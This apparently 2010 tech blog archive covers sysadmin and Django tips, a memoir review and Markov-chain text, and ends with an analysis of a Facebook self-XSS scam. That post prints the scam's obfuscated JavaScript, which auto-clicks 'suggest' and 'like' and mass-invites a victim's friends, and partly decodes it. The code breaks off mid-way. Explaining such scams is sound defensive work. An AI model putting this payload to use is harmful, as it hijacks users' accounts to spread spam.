Note that I did not actually run from Watsontown, PA to Midville, PA in 23 and a half minutes.

PROTIP: Just before you hit "Record" in My Tracks, be sure to use GPS Status (another free Android Market download) to make sure you have a GPS fix first.

12 July 2010

Two residency biographies

Frank Vertosick. When The Air Hits Your Brain: Parables of Neurosurgery. Fawcett, 1988.

Katrina Firlik. Another Day in the Frontal Lobe: A Brain Surgeon Exposes Life on the Inside. Random House, 2006.

Drs. Vertosick and Firlik wrote remarkably different books about the same subject: their neurosurgery residency. Both trained in the same system: the University of Pittsburgh Medical Center, separated by 14 years. Vertosick finished in 1988, whereas Firlik finished in 2002.

Vertosick's book is a series of case anecdotes from his training, interspersed with some reflections on the profession. Firlik's book includes a handful of case anecdotes, but the bulk of the text is expository rather than narrative. Item: Firlik discusses the dangers of misdiagnosing dementia as Alzheimer's or old age when it could be a tumor or normal-pressure hydrocephalus. Vertosick describes a case of "rolling out" a "big, juicy" meningioma in a patient most everyone but her surgeons thought was hopelessly demented. She made a full recovery. Item: Firlik describes the sophisticated skull-drills that stop running as soon as the bone is drilled through. Vertosick relates the first neurosurgical case he observed, where the junior resident cheerfully explained the clutch that stops the drill before it hits brain tissue -- then screamed curses and hustled Vertosick out of the room as the drill unexpectedly pierced straight through the skull and into the patient's brain.

For would-be patients, Firlik's book is undoubtedly the better of the two. The worst of the fratboy joshing that Firlik mentions is a pinup poster. In Vertosick's book, the high-water mark comes when Fred, the chief resident, "steals" a case from Gary, a senior resident: he performs the entire operation himself, then leaves Gary the ignominious task of closing the wound. Gary contents himself by carving "Fred Sucks" on the inside of the patient's skull---where he expected no-one would ever see it. Unfortunately for all parties, the patient developed an infection and the bone flap had to be removed, leaving Fred red-faced and screaming as he saw the "skull-o-gram." It's not the book one would give grandpa before spine surgery.

I preferred Vertosick's "case anecdotes with minimal filler" approach. Vertosick never discusses his childhood. Firlik confesses to being a bit of a neat freak. As a child, she kept her belongings meticulously organized; she even fantasized about being a cleaning lady. She describes a first date with her husband over Indian food, her desire for an outdoor lifestyle, her pity for those with desk jobs. Vertosick never mentions what he does outside the hospital. Firlik relates her interests in Japanese language, food, culture, packaging, and architecture.

Item: Dr. Firlik shares a pizza with her husband in a tony Italian restaurant, then is paged and rushes off to see a patient with a stroke and skyrocketing intracranial pressure. Her husband, also a neurosurgeon (but one who left the practice to be a venture capitalist), calmly boxes up the food as she rushes to the hospital. Vertosick shares a pizza with Gary the senior resident in a cheap dive by the medical center (the latter takes half the pizza, folds it on itself, and begins chewing), then is interrupted by a car crash and spinal trauma.

Significant others do not enter into Vertosick's memoir except in passing. Firlik met her husband in college and had been married to him for over ten years. Perhaps Firlik's story is the more unusual of the two: a friend told me that one of his neurosurgery-residency interviewers advised him to pick his residency carefully, "since it will last longer than your first marriage."

While Vertosick may have omitted the details of his life, he describes the psychological hardening effect of surgical training. The lengthiest introspective segment in Vertosick's memoir is one such instance: operating to clip an aneurysm, he slips and punctures the vessel, leaving the patient a vegetable. He calls Gary, long since departed for another hospital, who chain-smokes and tells him that if he's going to feel sorry for himself, he should hang up his mask, sit by a phone, and hand off patients to other brain surgeons. Firlik doesn't relate such a mistake (perhaps she, via luck or skill, avoided them), but does describe the emotional anguish of telling a young patient he had terminal cancer.

Firlik's book would be most appropriate for reassuring patients about the basics of neurosurgery or reassuring prospective physicians about the possibility of being a brain surgeon yet still having a life. Vertosick's book would likely disabuse prospective physicians of any such notion and would probably move all but the most desperate patients to stick with medical therapy. (As Gary tells Vertosick, "If the patient isn't dead, you can always make him worse.") For the interested non-patient/non-physician, Vertosick's book comes with my highest recommendation.

04 July 2010

MySQL replication master-change gotcha

If you move the master server in your MySQL replication setup, you might be tempted to simply issue the command CHANGE MASTER TO MASTER_HOST=''; on the slave to point it to the new master.

If you do, the slave will lose its place in the log and you'll get errors from key conflicts as the slave tries to reinsert old rows. (Errors if you're lucky. The slave might just silently insert duplicate rows.)

Instead, issue a SHOW SLAVE STATUS\G; and use the values for Master_Log_File and Read_Master_Log_Pos (I think you want this rather than Exec_Master_Log_Pos, but they were equal in my case -- check the manual) to populate MASTER_LOG_FILE and MASTER_LOG_POS. In other words, pass the log file and position along with the new host in the same CHANGE MASTER TO statement, so the slave resumes where it left off.


I screwed this up, but I was lucky enough to have just enlarged the volume, so I had an EBS snapshot of the last known good version of the slave. I just dumped the volume I'd broken and started from the snapshot. EC2+EBS ftw.
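
The CHANGE MASTER TO statement described above can be put together mechanically from the SHOW SLAVE STATUS output. Here's a minimal Python sketch, assuming you've already copied the status row into a dict. The function name build_change_master, the host db2.example.com, and the sample log values are all made up for illustration, and which position column to trust is left as a parameter (check the manual).

```python
def build_change_master(new_host, status, pos_field="Read_Master_Log_Pos"):
    """Build a CHANGE MASTER TO statement that keeps the slave's place in the log.

    status: dict holding one row of SHOW SLAVE STATUS output (hypothetical input).
    pos_field: which position column to use; consult the MySQL manual.
    """
    log_file = status["Master_Log_File"]
    log_pos = int(status[pos_field])  # int() rejects anything that isn't a number
    if "'" in new_host or "'" in log_file:
        raise ValueError("refusing to quote a value containing a single quote")
    return (
        "CHANGE MASTER TO MASTER_HOST='%s', MASTER_LOG_FILE='%s', MASTER_LOG_POS=%d;"
        % (new_host, log_file, log_pos)
    )

# Hypothetical values, for illustration only.
example_status = {"Master_Log_File": "mysql-bin.000042", "Read_Master_Log_Pos": "1337"}
statement = build_change_master("db2.example.com", example_status)
print(statement)
```

Printing the statement and pasting it into the mysql client by hand leaves a chance to eyeball the values before the slave acts on them.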

Debian->ubuntu mysql upgrade gotcha

If you're upgrading from Debian to Ubuntu, note that Ubuntu wraps MySQL in AppArmor and Debian doesn't. This means that if you played around with the paths that MySQL uses, mysqld might not be able to start at all.

The first thing to note is that you get no error notifications when "service mysql start" fails -- just an indefinite hang, as this thread notes. If you become root and run /usr/sbin/mysqld, you will get an error like this:

# /usr/sbin/mysqld
100704 19:41:08 [Warning] The syntax '--log_slow_queries' is deprecated and will be removed in MySQL 7.0. Please use '--slow_query_log'/'--slow_query_log_file' instead.
100704 19:41:08 [Note] Plugin 'FEDERATED' is disabled.
/usr/sbin/mysqld: Can't create/write to file '/tmp/ib17ii5f' (Errcode: 13)
100704 19:41:09 InnoDB: Error: unable to create temporary file; errno: 13
100704 19:41:09 [ERROR] Plugin 'InnoDB' init function returned error.
100704 19:41:09 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
100704 19:41:09 [ERROR] Unknown/unsupported table type: innodb
100704 19:41:09 [ERROR] Aborting

100704 19:41:09 [Note] /usr/sbin/mysqld: Shutdown complete

errno 13 means "permission denied."

Because I was using an Amazon EBS root filesystem, I wanted to eliminate unnecessary EBS overhead, so I'd moved /tmp to /tmp-old, made the directory /mnt/tmp on the local storage, and symlinked /tmp to /mnt/tmp. I thought the perms were correct, and I was able to make files in /tmp as an unprivileged user. I even ran vipw to edit /etc/passwd to give the mysql user a shell (otherwise, you can't su to mysql) and noted that it was possible to write files to /tmp. (I changed it back to /bin/false afterwards, of course.) Even when I told mysql to use the old directory (/usr/sbin/mysqld --tmpdir=/tmp-old), I got the same error message.

I dug through the init files and noticed some references to AppArmor. I checked the logs and found this:

Jul 4 19:41:09 domU-12-31-39-0E-C9-A1 kernel: [ 8095.267321] type=1503 audit(1278272469.041:18): operation="mknod" pid=5746 parent=4609 profile="/usr/sbin/mysqld" requested_mask="c::" denied_mask="c::" fsuid=106 ouid=106 name="/mnt/tmp/ib17ii5f"


The main reason for redirecting /tmp was an application of my own that produced thousands of cache files in /tmp. I changed the app to use /mnt/tmp instead. Now, mysql launched, but with a new error:

SSL error: Unable to get certificate from '/vol/etc/mysql/newcerts/server-cert.pem'
100704 19:52:14 [Warning] Failed to setup SSL
100704 19:52:14 [Warning] SSL error: Unable to get certificate

Unsurprisingly, in /var/log/messages, I found:

Jul 4 19:52:14 domU-12-31-39-0E-C9-A1 kernel: [ 8760.837526] type=1503 audit(1278273134.614:23): operation="open" pid=4609 parent=4602 profile="/usr/sbin/mysqld" requested_mask="r::" denied_mask="r::" fsuid=106 ouid=106 name="/vol/etc/mysql/newcerts/server-cert.pem"

The fix for this was pretty simple: I opened /etc/apparmor.d/usr.sbin.mysqld and below the line

/etc/mysql/*.pem r,

I added the line

/vol/etc/mysql/newcerts/*.pem r,
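
To work out which paths need a rule, you can pull the interesting fields out of the audit lines shown above. This is a minimal Python sketch, assuming the key="value" layout seen in those log lines; parse_denial is a made-up helper name, and other kernel versions may format the lines differently.

```python
import re

# Matches key="value" pairs in a kernel audit line.
PAIR = re.compile(r'(\w+)="([^"]*)"')

def parse_denial(line):
    """Return (profile, operation, denied_mask, path) from an audit line, or None."""
    fields = dict(PAIR.findall(line))
    if "denied_mask" not in fields:
        return None  # not an AppArmor denial in the format assumed here
    return (fields.get("profile"), fields.get("operation"),
            fields["denied_mask"], fields.get("name"))

sample = ('Jul 4 19:52:14 domU-12-31-39-0E-C9-A1 kernel: [ 8760.837526] type=1503 '
          'audit(1278273134.614:23): operation="open" pid=4609 parent=4602 '
          'profile="/usr/sbin/mysqld" requested_mask="r::" denied_mask="r::" '
          'fsuid=106 ouid=106 name="/vol/etc/mysql/newcerts/server-cert.pem"')
denial = parse_denial(sample)
print(denial)
```

The last element of the tuple is the path that the profile needs to allow, and the mask shows the kind of access that was refused.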


30 June 2010

How to eavesdrop on HTTPS traffic

I had an intermittent problem with my web app: a test suite intended to verify that client-cert SSL* worked was failing. It wasn't failing because the client-cert SSL auth was broken. It was failing because of a 400 Bad Request with the message:

Your browser sent a request that this server could not understand.
Request header field is missing ':' separator.

Of course, since the connection was SSL encrypted, I couldn't easily see what was going on.

Fortunately, wireshark has SSL decoding built in. It's a bit tricky to use, but this wiki page and this mailing list post explain what to do. Here's the short version:

1. If your server's SSL key isn't in a .pem file already, make one. Here's what I did:
openssl pkcs12 -export -in server.crt -inkey server.key -name "Server Certificate" -out server.p12 -passin pass: -passout pass:
openssl pkcs12 -in server.p12 -out server.pem -nodes -passin pass: -passout pass:

Note that there are no passwords on these keys -- this is my testbed server. If you have passwords on your keys, the steps may be different.

2. Tell wireshark about the .pem file. Go to Edit->Preferences, expand the protocols menu, and pick SSL from the list. If your https server is running on localhost, port 443, enter ",443,http,/path/to/your/server.pem" in the "RSA keys list" box.

3. Assuming that you don't have SSLCipherSuite defined elsewhere (in which case, you might want to temporarily comment it out if it contradicts this one), add the following entry to your apache2.conf and restart apache:


That turns off Diffie-Hellman key negotiation.

4. Make sure that your browser is opening a fresh connection. In Firefox, closing the tab and opening a new one appeared to be sufficient.

5. Start the capture on the appropriate interface. If everything works, Wireshark will decode it. If not, go back to the preferences dialogue, set a debug file, and try again. Look in the debug file for clues---perhaps Wireshark couldn't read your key, for instance.

* It tried to read a trivial CGI script that just echoed back the SSL environment variables like SSL_CLIENT_M_SERIAL and SSL_CLIENT_VERIFY.

Epic link of the day

If you've never played Xenogears, it won't make any sense, btw.

23 June 2010

Naming and Necessity

I think Microsoft Security Essentials is a great idea. However, one would think that when Microsoft added a feature that they admit might "unintentionally" send your personal information to their computers, they would call it something other than "SpyNet":

20 June 2010


By the way, the suggestion to switch Linux distrubutions in order to get a single app to work might sound absurd at first. And that's because it is. But I've been saturated with Unix-peanut-gallery effluvia for so long that it no longer even surprises me when every question -- no matter how simple -- results in someone suggesting that you either A) patch your kernel or B) change distros. It's inevitable and inescapable, like Hitler. --JWZ

I've been a Debian user since 2002. To get a single app to work, I just switched to Ubuntu.

The app was openssl. I'm building VMs using Ubuntu's vmbuilder, because there's no obvious equivalent for Debian. Unfortunately, the openssl/libssl0.9.8 that ships with Ubuntu (0.9.8k) has some bizarre, inexplicable incompatibility with the openssl/libssl0.9.8/mod_ssl that ships with Apache on Debian (0.9.8n). I was trying to do SSL client-certificate authentication from the Ubuntu VM to a Debian server. Using a Debian client (openssl s_client or just Python's HTTPS support) and a Debian Apache2 server worked fine. Using an Ubuntu client and an Ubuntu Apache2 worked fine. But the Ubuntu client and the Debian Apache2 failed.

The Right Thing to do would be to come up with a minimal case demonstrating the bug and post it in the appropriate bug tracker, but since I wasn't even sure if the bug was in Apache2 or in openssl, it would have taken some time to find the right place to report it. I was pressed for time and decided to punt by switching everything to Ubuntu.

I backed up my laptop's /var, /etc, and /home to a second computer via rsync. I burned the Ubuntu installer, which turned out to be a coaster: I wanted to encrypt my disk, and only the "alternate" installer supports that. I burned and booted the alternate .iso, erased my original Linux and swap partitions, created an encrypted partition, layered LVM on top of that, created new Linux and swap partitions inside the LVM, and started the installation. The install took what seemed like hours longer than a Debian install -- I'm not sure if that's simply because Ubuntu Desktop is much bigger than a minimal Debian install or because the crypto slowed down disk I/O. Possibly both. But the installer worked perfectly---it even recognized my Vista partitions and added them to the grub menu.

Ubuntu's wireless support is thousands of times more wonderful than Debian's: instead of writing shell scripts to connect to open and WEP networks and having to run them from the command line every time I woke the computer from sleep and being completely unable to connect to WPA networks (the wpa_supplicant manual could double as creepypasta), Ubuntu has NetworkManager and a lovely GUI widget to control wireless connectivity. I don't particularly like always-on GUI widgets, but you can easily hide the Ubuntu widget/menu bar by right-clicking it, choosing 'Properties', and ticking "Auto-hide". I installed enlightenment (packaged as e16) and chose E16-Gnome at the login screen. I switched off all the iconboxes, virtual desktops (I want _multiple_ desktops, not virtual ones), tooltips, and pagers. I made one small change to e16's configuration, editing /etc/e16/bindings.cfg to open gnome-terminal rather than Eterm when I hit Ctrl-Alt-Insert (change "KeyDown CA Insert exec Eterm" to "KeyDown CA Insert exec gnome-terminal"). The result: wonderful.

Oh, and SSL client-auth now works.

18 June 2010

debhelper help

If you want to install a cron.d file using a debian/ubuntu package and you're using debhelper, you can just leave a file called package-name.cron.d in the debian/ directory. The manual explains this. The manual doesn't mention (maybe it's obvious to people other than me) that you have to make sure dh_installcron is in your debian/rules in the appropriate place (for instance, perhaps after dh_installdocs in binary-indep, depending on what kind of package you're building.)

Note that you will also need an explicit username in cron.d, e.g.,

30 12 * * * someuser /usr/sbin/someprogram

14 June 2010

M-x awesome-mode

James Fallows mentioned how much he liked full-screen mode in his word processor. Since I use the best text editor known to man, I thought I'd try it. Here's what I added to my ~/.emacs.el. Like all of my .emacs.el, it's cribbed from various places on the 'net, mostly here:

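;; Toggle full-screen via wmctrl. (interactive) makes this a command,
;; which it must be before it can be bound to a key.
(defun switch-nerd-mode ()
  (interactive)
  (shell-command "wmctrl -r :ACTIVE: -b toggle,fullscreen"))
(global-set-key [f11] 'switch-nerd-mode)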

(Note that this assumes you'll have the menu bar and scroll bar switched on when you're not in full-screen mode. It also assumes that you switched off the toolbar, which is on by default.)

Now, this _almost_ works. But there's one problem:

For whatever reason, there's a thin strip of desktop peeking through. I'm not sure why: Firefox fullscreens perfectly. But Gnome Terminal has the leftover strip. (I don't use any other programs, really.)

I was too lazy to actually debug it, so I did what any respectable nerd would do: I set the desktop background to the same color as my emacs window. I set the desktop to solid black, installed the emacs-goodies-el Debian package, which includes a bunch of color themes, ran M-x color-theme-select, and picked Retro Green, which looks like this:

Yes, that's my whole display. No title bars, scroll bars, task trays, menus, clocks, widgets, heatmaps, thermometers, netload meters, mail indicators --- nothing.

One problem with Retro Green is that its narrow color selection (green and black) means that fancy major modes with lots of colors are less useful: for instance, in python-mode, I typed os.exec instead of os.system and was wondering why pylint was throwing a syntax error on that line. If I'd been using the standard mode, the exec keyword would have been purple.

One last tip: if you launch ediff, the ediff control window might sometimes appear under your main window, or somewhere off-screen entirely. If you're using Enlightenment 0.16 (which is the least terrible WM I've used), just hit Ctrl+Alt+Home and E will move it to the front so you can put it somewhere sensible.

If someone has a more awesome Emacs windowing setup than this, I'd like to see it. (Note that I'll probably copy it.)

Update: Since I switched to Ubuntu, switching to full-screen mode actually gives me the full screen in both Emacs and gnome-terminal. Win.

11 June 2010

Booting a .vmdk with VirtualBox

I have a VMware .vmdk+.vmx image created with Ubuntu's wonderful vmbuilder. I wanted to boot it with VirtualBox (since I didn't see an easy way to install VMware on the Debian box I was using, and didn't think it was necessary). Unfortunately, every time I tried to boot, the system complained that it couldn't find the root filesystem and dropped me to an initramfs busybox shell.

ALERT! /dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx does not exist. Dropping to a shell!

I tried editing the root= parameter in grub to change it from a UUID to /dev/sda1 or /dev/hda1, to no avail. Flailing, I reconfigured VirtualBox: I deleted the SATA controller, added an IDE controller, and attached the .vmdk to it. I rebooted. It worked!

09 June 2010

Midafternoon diversion

Result of running a word-based Markov chain text generator on the Craigslist personals:

Men seeking women:

I know you ask; me. I am a message And take control. I also like
older than me each one. I'm adventure and have a vast knowledge of
further: conversation. I would appreciate your highest goals in lieu
of a date this post is consistent actually an issue. Geographic
location open to you after a up my terrible ego jumps out more Please
be cute, woman between ish who's interested. If a normal guy on it is
easy to Hold a normal relationship with dark hair i go to plead with
the contrary.

Women seeking men:

I love to land in quincy. Hi, so I don't forget I am saying
certain to chat and I love type a friend long time with. Life
has a light brown hair, blue eyes. I love? You're not thin,
or maybe a Great day, that is this is kind, of yourself in size
work day and just be athletic is your parents, must not for
work out with photos get I Am a spider. He life I am not much
more than dwell on your my own my group or go to cook, wrestle,
go out or ROBOTS Please be greatly appreciated with you like to
be become been to all I'm one of chick this?

Women seeking women:

Someone who is just so not? I am looking; for me A the Trina Hamlin
figthing didnt want someone who has in a little experience, a person
but know me and I'll send me an unfortunate circumstance since middle
school and therefore often in College student but it's pretty hard at
least for? It is there.

Men seeking men:

Older guy here looking for if you must big jock looking for details to
travel. I'm masc or an oler guy here: and here (to party and also be
Very private very goodlooking and me beg)? I am masculine hairy fit,
maybe your hot? Wm looking to try it slow with a time, for games Yr
old asian guys interested?
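
For the curious, a word-based Markov chain generator is only a few lines. The generator that produced the text above isn't shown here, so this is a generic first-order sketch in Python (each word is chosen based only on the word before it); the tiny corpus and the function names are invented for illustration.

```python
import random
from collections import defaultdict

def build_chain(text):
    """Map each word to the list of words that follow it in the text."""
    words = text.split()
    chain = defaultdict(list)
    for current, following in zip(words, words[1:]):
        chain[current].append(following)
    return chain

def generate(chain, start, length, rng):
    """Random-walk the chain from `start`, emitting at most `length` words."""
    word = start
    out = [word]
    for _ in range(length - 1):
        followers = chain.get(word)
        if not followers:  # dead end: this word was never followed by anything
            break
        word = rng.choice(followers)
        out.append(word)
    return " ".join(out)

# Made-up corpus; a real run would feed in a pile of scraped posts.
corpus = "I love to cook and I love to travel and I am looking for someone to cook with"
chain = build_chain(corpus)
sample_text = generate(chain, "I", 12, random.Random(0))
print(sample_text)
```

Because repeated followers stay in the list, common word pairs are picked more often, which is what gives the output its almost-plausible rhythm.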

04 June 2010

Django CSRF gotcha

Django contains a decorator, @csrf_exempt, that you can apply to a view function to tell the anti-CSRF CsrfViewMiddleware to ignore that view. While it's obvious in retrospect, make sure you apply the decorator to the actual view (i.e., the function listed in your URLconf); if you apply it to a function called by that view function, CsrfViewMiddleware will merrily ignore it and raise a CSRF error.
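
A toy model of why this happens, in plain Python rather than Django's real code: assume the decorator just sets a flag on the function it wraps, and the middleware checks only the callable that the URL resolver hands it. The names middleware_allows, helper, wrong_view, and right_view are invented for the sketch.

```python
def csrf_exempt(view_func):
    """Stand-in for the decorator: mark the wrapped callable as exempt."""
    def wrapped(*args, **kwargs):
        return view_func(*args, **kwargs)
    wrapped.csrf_exempt = True
    return wrapped

def middleware_allows(callback, has_valid_token):
    """Stand-in for the middleware: it only ever sees the routed callable."""
    if getattr(callback, "csrf_exempt", False):
        return True
    return has_valid_token

@csrf_exempt
def helper(request):
    return "handled %s" % request

def wrong_view(request):   # routed view; the exempt flag is on helper, not here
    return helper(request)

@csrf_exempt
def right_view(request):   # routed view carries the flag itself
    return "handled %s" % request

print(middleware_allows(wrong_view, has_valid_token=False))
print(middleware_allows(right_view, has_valid_token=False))
```

In this model the check runs before the view body, so a flag on something the view calls later is never consulted.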

03 June 2010

FUSE confusion

The FUSE error

fuse: device not found, try 'modprobe fuse' first

is misleading. You might actually have the FUSE module loaded (check with lsmod|grep fuse), but the device doesn't exist. Check for the presence of /dev/fuse. In my case, it was never created because udev wasn't running when I installed FUSE or loaded the fuse module (or possibly both). Some combination of /etc/init.d/udev start and /etc/init.d/udev stop and /etc/init.d/udev reload got udev to create /dev/fuse.
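
The two checks above (is the module loaded, does the device node exist) can be rolled into one small diagnostic. This is a rough Python sketch, assuming a Linux system where loaded modules are listed in /proc/modules; fuse_status and read_text are made-up names.

```python
import os

def fuse_status(proc_modules_text, device_exists):
    """Classify a FUSE setup from /proc/modules contents and a /dev/fuse check."""
    loaded = any(line.split()[:1] == ["fuse"]
                 for line in proc_modules_text.splitlines())
    if device_exists:
        return "ok" if loaded else "ok (device present; fuse may be built into the kernel)"
    if loaded:
        return "module loaded but /dev/fuse is missing (check udev)"
    return "module not loaded (try 'modprobe fuse')"

def read_text(path):
    """Return the file's contents, or an empty string if it can't be read."""
    try:
        with open(path) as handle:
            return handle.read()
    except OSError:
        return ""

print(fuse_status(read_text("/proc/modules"), os.path.exists("/dev/fuse")))
```

The "module loaded but /dev/fuse is missing" branch is the case described above, where the error message points at the wrong culprit.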

That meant that I graduated to the next peanut-gallery error:

mount: unknown filesystem type 'ext4'

(I'm running Debian Lenny, so ext4 is only supported if you ignore the dire warnings.)


26 May 2010

Django manual-transaction fun

If you use the @commit_manually decorator to manage a transaction, Django will throw a TransactionManagementError ("Transaction managed block ended with pending COMMIT/ROLLBACK") if you fail to commit or rollback the transaction before you exit the function.

If you exit the function due to an exception, Django will sometimes show you the exception that caused the exit. But sometimes it will not: it will only show you the TransactionManagementError, leaving you scratching your head. I've discovered that you get the TransactionManagementError if you modify an object via Django's object-relational mapper. You get the underlying exception if you modify the database via a raw SQL query. Example:


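from django.db import connection, transaction
from django.http import HttpResponse

@transaction.commit_manually
def test_view(request):
    cur = connection.cursor()
    cur.execute("insert into quux (val) values ('a')")  # raw SQL write
    tmodel = TestModel(somenum = 5)
    tmodel.save()  # write through the object-relational mapper
    assert 0  # stand-in for an unexpected exception before commit/rollback
    return HttpResponse("id: %d" % tmodel.id)  # never reached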


class TestModel(models.Model):
    somenum = models.IntegerField()

manually-created InnoDB table:

CREATE TABLE `quux` (
`id` integer primary key AUTO_INCREMENT,
`val` text
) ENGINE=InnoDB;

If you view test_view, you will get a TransactionManagementError. If you move the "assert 0" above the line that saves the model through the mapper, you get an AssertionError. Raw SQL queries are fine, but you get confusing results if you use the mapper.

If you comment out the mapper call but call transaction.set_dirty(), as you're supposed to when you modify the database with raw SQL, you get a TransactionManagementError.

Lesson: if you're getting unexpected TransactionManagementErrors, make sure your code isn't throwing exceptions. Quick fix to see the underlying exception: comment out the @commit_manually decorator. You will lose transactional integrity, so don't do this on a production system.
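
One plausible explanation for the masking, sketched as a toy model in plain Python. None of this is Django's actual code: FakeTransaction and this commit_manually are invented stand-ins. The assumption is that the decorator checks for uncommitted changes in a "finally" block, so an error raised there replaces whatever exception was already in flight, and that only mapper writes mark the transaction dirty.

```python
class TransactionManagementError(Exception):
    pass

class FakeTransaction:
    """Toy transaction state: 'dirty' means there are uncommitted changes."""
    def __init__(self):
        self.dirty = False

def commit_manually(txn):
    """Toy decorator: complain on exit if the function left the transaction dirty."""
    def decorator(func):
        def wrapper(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            finally:
                if txn.dirty:
                    # Raised from 'finally', so it supersedes any exception in flight.
                    raise TransactionManagementError(
                        "Transaction managed block ended with pending COMMIT/ROLLBACK")
        return wrapper
    return decorator

txn = FakeTransaction()

@commit_manually(txn)
def orm_style_view():
    txn.dirty = True   # what a mapper save is assumed to do
    assert 0           # the real bug

@commit_manually(txn)
def raw_sql_view():
    assert 0           # raw SQL is assumed not to mark the transaction dirty

def outcome(view):
    """Run a view on a clean transaction and report which exception escaped."""
    txn.dirty = False
    try:
        view()
    except Exception as exc:
        return type(exc).__name__
    return "no exception"

print(outcome(orm_style_view))
print(outcome(raw_sql_view))
```

In the toy model, the dirty view reports only the transaction error while the clean one lets the AssertionError through, matching the behavior described above.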

13 May 2010

Those darn Facebook scammers!

I've lately received a few spammish Facebook "suggestions":
  • Subject: [name withheld] suggested you become a fan of *Whole Foods Market*FREE $500 Gift Card* Limited - first 1...
  • Subject: [name withheld] suggested you become a fan of SEE WHO'S VIEWING YOUR PROFILE NOW!..
  • Subject: [name withheld] suggested you like How a Competition Ended a 10 Year Marriage - Video...
  • Subject: [name withheld] suggested you like PROVEN - Most Adults CANNOT solve th!s YET Almost ALL children CAN...

All of the [name withheld]s were people I know who'd evidently been duped in some way or other. Since the very last one was a computer scientist at a very famous Eastern university, I had to figure out how they'd done it. I defanged whatever evils lurked on the page by clearing my Facebook cookies, then Googled the "most adults" subject line to find the page. (I didn't want to click the link, in case it included some identifier that would let the evil app work even without my having logged in.)

The page contained a "riddle" (formatted as an image, possibly to defeat a text-search for this scam):

...followed by a "click for solution" button that ran a clever little JavaScript program. First it asked me to hold down the Control key. Any adult can do that, right? Then "C". Then it told me it had copied something to my clipboard. Clever. It must have been from a hidden selection area. Then it asked me to press and hold "Alt", then press "D" to select the address bar. Finally, it asked me to press "Control" and then "V", followed by Enter. I wasn't logged in, so this didn't do anything but bring up a "Loading..." box. This was the code snippet, prefixed with "javascript:" to make it executable in the location bar.

(I have changed the app ID 120715334615757 to XYZ just to make it harder for someone to inadvertently run this code.)

function(){a='appXYZ_jop';b='appXYZ_jode';ifc='appXYZ_ifc';ifo='appXYZ_ifo';mw='appXYZ_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

That was enlightening.

If you replace eval( with alert( and run this code, you'll strip off the first layer of obfuscation:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[